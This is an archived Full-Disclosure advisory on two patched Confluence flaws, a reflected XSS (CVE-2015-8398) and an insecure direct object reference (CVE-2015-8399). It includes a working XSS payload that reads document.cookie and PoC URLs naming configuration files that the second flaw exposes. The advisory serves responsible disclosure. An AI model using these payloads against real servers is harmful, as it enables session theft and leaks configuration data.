lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 4 Jan 2016 12:28:46 +0100
From: Sebastian Perez <s3bap3@...il.com>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org
Subject: [FD] Confluence Vulnerabilities

[Systems Affected]
Product : Confluence
Company : Atlassian
Versions (1) : 5.2 / 5.8.14 / 5.8.15
CVSS Score (1) : 6.1 / Medium (classified by vendor)
Versions (2) : 5.9.1 / 5.8.14 / 5.8.15
CVSS Score (2) : 7.7 / High (classified by vendor)


[Product Description]
Confluence is team collaboration software, where you create, organize and
discuss work with your team. it is developed and marketed by Atlassian.


[Vulnerabilities]
Two vulnerabilities were identified within this application:
(1) Reflected Cross-Site Scripting (CVE-2015-8398)
(2) Insecure Direct Object Reference (CVE-2015-8399)


[Advisory Timeline]
26/Oct/2015 - Discovery and vendor notification
26/Oct/2015 - Vendor replied for Cross-Site Scripting (SEC-490)
26/Oct/2015 - Issue CONF-39689 created
27/Oct/2015 - Vendor replied for Insecure Direct Object Reference (SEC-491
/ SEC-492)
27/Oct/2015 - Issue CONF-39704 created
16/Nov/2015 - Vendor confirmed that Cross-Site Scripting was fixed
19/Nov/2015 - Vendor confirmed that Insecure Direct Object Reference was
fixed


[Patch Available]
According to the vendor, upgrade to Confluence version 5.8.17


[Description of Vulnerabilities]
(1) Reflected Cross-Site Scripting
An unauthenticated reflected Cross-site scripting was found in the REST
API. The vulnerability is located at /rest/prototype/1/session/check/ and
the payload used is <img src=a onerror=alert(document.cookie)>
[References]
CVE-2015-8398 / SEC-490 / CONF-39689
[PoC]
http://<Confluence
Server>/rest/prototype/1/session/check/something%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29%3E

(2) Insecure Direct Object Reference
Two instances of Insecure Direct Object Reference were found within the
application, that allows any authenticated user to read configuration files
from the application
[References]
CVE-2015-8399 / SEC-491 / SEC-492 / CONF-39704
[PoC]
http://<Confluence
Server>/spaces/viewdefaultdecorator.action?decoratorName=<FILE>
http://<Confluence
Server>/admin/viewdefaultdecorator.action?decoratorName=<FILE>

This is an example of accepted <FILE> parameters
/WEB-INF/decorators.xml
/WEB-INF/glue-config.xml
/WEB-INF/server-config.wsdd
/WEB-INF/sitemesh.xml
/WEB-INF/urlrewrite.xml
/WEB-INF/web.xml
/databaseSubsystemContext.xml
/securityContext.xml
/services/statusServiceContext.xml
com/atlassian/confluence/security/SpacePermission.hbm.xml
com/atlassian/confluence/user/OSUUser.hbm.xml
com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
com/atlassian/confluence/user/ConfluenceUser.hbm.xml

-- 
S3ba
@s3bap3
linkedin.com/in/s3bap3

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists